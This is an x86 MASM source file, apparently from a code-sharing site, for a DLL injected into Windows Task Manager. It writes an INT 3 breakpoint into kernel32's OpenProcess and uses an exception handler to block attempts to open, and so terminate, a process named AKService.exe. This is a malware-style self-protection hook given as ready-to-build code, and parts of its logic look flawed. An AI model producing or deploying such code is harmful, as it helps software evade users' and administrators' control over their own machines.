📄 hookapi.asm
字号:
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; taskmgr空间中的API HOOK
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat, stdcall
option casemap :none
include /masm32/include/windows.inc
include /masm32/include/kernel32.inc
includelib /masm32/lib/kernel32.lib
SEH struct
dwSafeEip dd ?
dwPrevEsp dd ?
dwPrevEbp dd ?
SEH ends
InstSehFrame macro _lpContinueAddr
mov stSEH.dwSafeEip,_lpContinueAddr
mov stSEH.dwPrevEbp,ebp
push offset _SehHandler
assume fs:nothing
push fs:[0]
mov stSEH.dwPrevEsp,esp
mov fs:[0],esp
endm
KillSehFrame macro
pop fs:[0]
add esp,4
endm
.data?
hInstance dd ?
dwAKServiceID dd ?
dwTaskmgrID dd ?
hKernel32 dd ?
lpEntryAddr dd ?
dwOldProtect dd ?
bOldByte db ?
stSEH SEH <>
.data
szLibKernel db 'kernel32',0
szOpenProcess db 'OpenProcess',0
szAKService db 'AKService.exe',0
.code
_HookAPI proc
pushad
;保存API的原入口地址
invoke GetModuleHandle,addr szLibKernel
mov hKernel32,eax
invoke GetProcAddress,hKernel32,addr szOpenProcess
mov lpEntryAddr,eax
;把内存设置成 可读/可写/可执行:
invoke VirtualProtect,lpEntryAddr,1,PAGE_EXECUTE_READWRITE,addr dwOldProtect
mov edx,lpEntryAddr
mov cl,BYTE ptr [edx]
mov bOldByte,cl ;保存函数入口第一个字节
mov BYTE ptr [edx],0CCh ;插入INT 3指令
popad
ret
_HookAPI endp
_SehHandler proc c uses ecx ebp lpExceptionRecord,lpFrame,lpContext,lpDispatch
mov eax,lpContext
assume eax:ptr CONTEXT
mov ebp,[eax].regEsp
assume eax:nothing
mov eax,[ebp-4];获得调用OpenProcess时压入堆栈的参数dwProcessId
.if eax==dwAKServiceID;如果dwAKServiceID等于dwAKServiceID,说要要关闭的是AKService服务
ret
.else
;把API原入口地址写回去,以便继续运行原API
mov eax,lpEntryAddr
mov cl,bOldByte
mov BYTE ptr [eax],cl
jmp eax;跳回到OpenProcess入口,正常关闭其它进程
;继续下一个Execution
mov eax,ExceptionContinueExecution
ret
.endif
_SehHandler endp
_SearchProcess proc
local @stProcess:PROCESSENTRY32
local @hSnapShot
.while 1
invoke RtlZeroMemory,addr @stProcess,sizeof @stProcess
mov @stProcess.dwSize,sizeof @stProcess
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
mov @hSnapShot,eax
invoke GetCurrentProcessId
mov dwTaskmgrID,eax
invoke Process32First,@hSnapShot,addr @stProcess
.while eax
lea eax,@stProcess.szExeFile
mov edx,eax
invoke lstrcmp,edx,addr szAKService
.if eax==0
mov eax,@stProcess.th32ProcessID
mov dwAKServiceID,eax
invoke _HookAPI
.break
.endif
invoke Process32Next,@hSnapShot,addr @stProcess
.endw
invoke CloseHandle,@hSnapShot
invoke Sleep,500
.endw
_SearchProcess endp
DllEntry proc _hInstance,_dwReason,_dwReserved
local @dwThreadID
InstSehFrame <offset _SehHandler>
.if _dwReason == DLL_PROCESS_ATTACH
push _hInstance
pop hInstance
invoke CreateThread,NULL,0,offset _SearchProcess,NULL,\
NULL,addr @dwThreadID
invoke CloseHandle,eax
.endif
mov eax,TRUE
KillSehFrame
ret
DllEntry Endp
End DllEntry
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -